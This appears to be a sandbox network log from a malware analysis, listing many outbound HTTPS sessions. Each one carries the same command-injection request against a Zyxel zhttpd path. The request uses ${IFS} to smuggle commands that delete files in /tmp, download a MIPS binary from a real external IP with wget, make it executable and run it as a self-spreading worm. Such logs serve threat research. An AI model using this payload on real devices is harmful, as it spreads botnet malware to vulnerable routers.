                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3671192.168.2.1433880133.19.0.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576473951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3672192.168.2.1444086173.248.63.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576493025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3673192.168.2.1438164161.66.76.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576519012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3674192.168.2.1449230103.58.217.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576543093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3675192.168.2.145827634.94.76.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576626062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3676192.168.2.145836023.207.194.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576654911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3677192.168.2.14431602.152.245.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576682091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3678192.168.2.1438266149.219.72.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576734066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3679192.168.2.1455510142.168.202.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576776028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3680192.168.2.1437030148.220.182.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576824903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3681192.168.2.1445296108.91.79.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576847076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3682192.168.2.1433146104.45.142.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576884985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3683192.168.2.1442458188.243.232.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576924086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3684192.168.2.1449964155.133.137.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.576948881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3685192.168.2.144612442.222.49.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577018976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3686192.168.2.144703846.99.252.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577027082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3687192.168.2.1454488182.75.254.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577056885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3688192.168.2.1444534192.109.251.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577162981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3689192.168.2.145430817.214.79.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577188015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3690192.168.2.145940875.220.9.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577217102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3691192.168.2.145687623.177.189.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577254057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3692192.168.2.1437064103.198.147.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577306986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3693192.168.2.144467075.251.123.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577337027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3694192.168.2.144080831.144.102.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577382088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3695192.168.2.145698499.98.2.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577419996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3696192.168.2.1455290202.68.43.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577461004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3697192.168.2.1455788126.9.178.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577508926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3698192.168.2.143817442.152.39.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577558041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3699192.168.2.144668677.31.0.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577599049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3700192.168.2.1442302160.40.113.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577627897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3701192.168.2.144559468.125.111.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577665091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3702192.168.2.1456796171.181.24.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577702045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3703192.168.2.1433118155.99.115.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577735901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3704192.168.2.1445440129.51.41.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577780008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3705192.168.2.1453624188.152.105.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577811003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3706192.168.2.1452316134.235.198.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577847958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3707192.168.2.14502405.246.207.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577900887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3708192.168.2.1455332184.12.236.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577929020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3709192.168.2.146006276.126.161.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.577970028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3710192.168.2.1447372182.173.97.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578011990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3711192.168.2.1452926122.246.198.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578063011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3712192.168.2.14456981.243.114.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578085899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3713192.168.2.1432796129.23.71.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578114033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3714192.168.2.1450214199.252.84.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578145027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3715192.168.2.144942481.54.151.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578188896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3716192.168.2.1459432136.146.13.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578242064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3717192.168.2.1437118108.131.155.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578301907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3718192.168.2.144588087.235.95.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578305960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3719192.168.2.1457468132.245.189.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578391075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3720192.168.2.145747872.176.101.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578393936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3721192.168.2.1452850120.70.117.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578425884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3722192.168.2.145687476.100.8.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578454971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3723192.168.2.143462046.85.30.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578512907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3724192.168.2.1452188203.27.194.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578536034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3725192.168.2.1436962198.201.119.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578584909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3726192.168.2.144641474.211.36.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578615904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3727192.168.2.14528401.113.212.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578675032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3728192.168.2.1450070120.132.55.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578708887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3729192.168.2.144069834.155.172.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578761101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3730192.168.2.145786478.186.0.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578802109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3731192.168.2.143357490.4.208.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578804970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3732192.168.2.1441990145.31.150.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578828096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3733192.168.2.14445609.155.87.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.578870058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
